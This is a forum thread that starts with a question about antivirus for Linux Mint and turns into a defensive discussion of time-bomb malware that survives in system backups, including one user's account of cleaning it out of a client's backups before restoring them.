I know that Linux is more secure than Windows and normally doesn’t need an antivirus, but know myself I’m gonna end up downloading something at some point from somewhere on the internet, and it would be good to be prepared. So, which antivirus would you recommend for Linux (Mint specifically) just to double up on security?

  • golden_zealot@lemmy.ml
    link
    fedilink
    English
    arrow-up
    1
    ·
    7 days ago

    There are viruses that are time-bombs. They specifically don’t do really do anything until some criteria is met in the future, such as the current date being beyond a specific date, at which point they proc. They do this in order to make sure they are in your backups when you restore them so that they immediately run when recovery is completed and the system is booted.

    • utopiah@lemmy.ml
      link
      fedilink
      arrow-up
      2
      ·
      7 days ago

      That doesn’t make much sense to me, one backup data, not executables or system. Even if they were to be saved in the backup then they wouldn’t get executed back.

      Anyway, that’s still conceptually interesting but it’s so very niche I’d be curious to hear where it’s being used, any reference to read on where those exist in the wild?

      • golden_zealot@lemmy.ml
        link
        fedilink
        English
        arrow-up
        2
        ·
        edit-2
        7 days ago

        They usually embed themselves in within the system files and have some scheduled job that basically checks for the criteria - if you are only backing up and restoring user data then it’s a non-issue, but if you do a full recovery including the system files/the system scheduler etc, then it can happen, and it is often necessary to backup executable and system files for production environments (true, not so much for individual users and their systems).

        When I was working in an IT shop, one of our clients was ransomwared with this method. The saving grace for us in that instance is that our backups were going to a product that allowed you to easily break open and dissect the compressed backups pre-recovery, so we were able to determine where the malicious files were and kill them before pushing the backups. Of course we only noticed that it was in the backups after we had tried to push the backups once already, so it was quite the timely process - I think I worked for something like 18 hours that day.

        You can read about such malware if you search for “timebomb malware” or “malware does not execute until date” etc.

        The attack is not super common anymore, but still happens.

        For example, here is an article discussing time bomb methods on linkedin.

        https://www.linkedin.com/pulse/time-bombs-malware-delayed-execution-any-run

        Another on the knowbe4 blog:

        https://blog.knowbe4.com/ransomware-can-destroy-backups-in-four-ways

        • utopiah@lemmy.ml
          link
          fedilink
          arrow-up
          2
          ·
          7 days ago

          Thanks, it’s quite interesting but again IMHO it relies on bad practices. If you’ve been compromised and you “restore” (not in an sandboxed environment dedicated to study the threat) then you are asking for trouble. I’ll read a bit more in depth but the timeline I see 1987, 1998, 2017 show me this is a very very niche strategy, to the point that it’s basically irrelevant. Again it’s good to know of it, conceptually, but in practice proper backups (namely of data) remains in my eyes the best way to mitigate most problems, attacks and just back luck (failing hardware, fire, etc) alike.

          • golden_zealot@lemmy.ml
            link
            fedilink
            English
            arrow-up
            2
            ·
            edit-2
            7 days ago

            Oh for sure - I think that this method has more efficacy in production environments ran by small businesses anyway, since best practices are rarely followed in many of them (until something happens that changes their mind on what they budget for haha), and even at that it is still a rare attack to see.

            I am unaware of this type of attack ever occurring on a persons personal network, most likely because so few end users make backups, there is no need to go through the trouble of doing this, making this method useful only in highly targeted attacks.

            We are definitely in agreement on proper backups still being the best method to recover from the vast majority of problems - even this one, depending on the backup solution.